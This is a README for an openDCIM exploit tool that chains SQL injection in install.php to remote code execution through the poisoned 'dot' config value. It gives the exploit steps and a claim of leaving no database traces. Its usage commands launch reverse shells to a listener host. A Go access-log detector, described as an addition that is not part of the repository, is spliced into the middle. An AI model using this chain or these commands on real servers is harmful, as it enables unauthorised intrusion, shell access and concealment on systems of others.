Chocapikk/opendcim-exploit

openDCIM install.php SQLi to RCE chain (CWE-862 + CWE-89 + CWE-78)
openDCIM - SQLi to RCE via Config Poisoning

Remote code execution chain targeting openDCIM's install.php LDAP configuration form. Built on the VulnCheck go-exploit framework.

Vulnerability Chain

| # | CVE | CWE | Description |
|---|-----|-----|-------------|
| 1 | CVE-2026-28515 | CWE-862 | install.php performs no role check before the LDAP config form, so any user reaches it |
| 2 | CVE-2026-28516 | CWE-89 | Config::UpdateParameter() builds its query by string interpolation; PDO with MySQL allows stacked queries |
| 3 | CVE-2026-28517 | CWE-78 | report_network_map.php passes the dot config value directly to exec() |

Affected: All versions (tested on latest commit 4467e9c4)

How It Works

  1. POST to install.php - SQL injection via LDAP form backs up config, overwrites dot with a command payload
  2. GET report_network_map.php - triggers exec(), confirms RCE via id output
  3. POST to install.php - overwrites dot with reverse shell payload
  4. GET report_network_map.php - triggers reverse shell
  5. POST to install.php - restores all original config values from backup table

Zero traces left in the database after exploitation.
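The database may be clean afterwards, but the web server's access log still records the request sequence from the steps above. As an added defensive example that is not part of this repository, the Go program below scans constructed Apache combined-format log lines and raises one alert per client that POSTs to install.php and then GETs report_network_map.php within a short window. The sample lines, the 60-second window and the FindChains name are assumptions.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
	"time"
)

// Constructed sample access log lines (Apache combined format); not real traffic.
const sampleLog = `10.0.0.2 - - [10/Mar/2026:12:00:01 +0000] "POST /install.php HTTP/1.1" 200 512 "-" "Go-http-client/1.1"
10.0.0.2 - - [10/Mar/2026:12:00:03 +0000] "GET /report_network_map.php HTTP/1.1" 200 2048 "-" "Go-http-client/1.1"
10.0.0.9 - - [10/Mar/2026:12:05:00 +0000] "GET /report_network_map.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.2 - - [10/Mar/2026:12:00:10 +0000] "POST /install.php HTTP/1.1" 200 512 "-" "Go-http-client/1.1"`
// Captures client address, timestamp, method and request path from a combined-format line.
var lineRe = regexp.MustCompile(`^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*"`)
// Assumed maximum gap between the install.php POST and the report_network_map.php GET.
const window = 60 * time.Second
// FindChains returns one alert per client that performed the install.php -> report_network_map.php sequence.
func FindChains(log string) []string {
	lastInstall := map[string]time.Time{} // client -> time of its most recent install.php POST
	var alerts []string
	for _, line := range strings.Split(log, "\n") {
		m := lineRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		ts, err := time.Parse("02/Jan/2006:15:04:05 -0700", m[2])
		if err != nil {
			continue
		}
		ip, method, path := m[1], m[3], strings.SplitN(m[4], "?", 2)[0] // drop any query string
		switch {
		case method == "POST" && strings.HasSuffix(path, "/install.php"):
			lastInstall[ip] = ts
		case method == "GET" && strings.HasSuffix(path, "/report_network_map.php"):
			if t, ok := lastInstall[ip]; ok && ts.Sub(t) >= 0 && ts.Sub(t) <= window {
				alerts = append(alerts, fmt.Sprintf("%s: install.php POST at %s then report_network_map.php GET at %s", ip, t.Format(time.RFC3339), ts.Format(time.RFC3339)))
				delete(lastInstall, ip) // one alert per POST/GET pair
			}
		}
	}
	return alerts
}

func main() {
	for _, a := range FindChains(sampleLog) {
		fmt.Println("ALERT", a)
	}
}
```

On the sample above only 10.0.0.2 is reported; the lone GET from 10.0.0.9 and the trailing POST without a follow-up GET are not.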

Build

go build -o opendcim-exploit .

Usage

Docker deployments (unauthenticated)

# Scan only
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80

# Exploit with reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer

htpasswd deployments (any valid user)

./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass

SSL

./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer

Flags

| Flag | Default | Description |
|------|---------|-------------|
| -rhost | | Target host |
| -rport | 80 | Target port |
| -ssl | false | Use HTTPS |
| -lhost | | Listener host (for reverse shell) |
| -lport | | Listener port (for reverse shell) |
| -c2 | | C2 type: SimpleShellServer or SSLShellServer |
| -username | | HTTP Basic Auth username (omit for SetEnv deployments) |
| -password | | HTTP Basic Auth password (omit for SetEnv deployments) |
| -a | | Asset detection (check if target is exploitable) |
| -e | | Exploit mode |
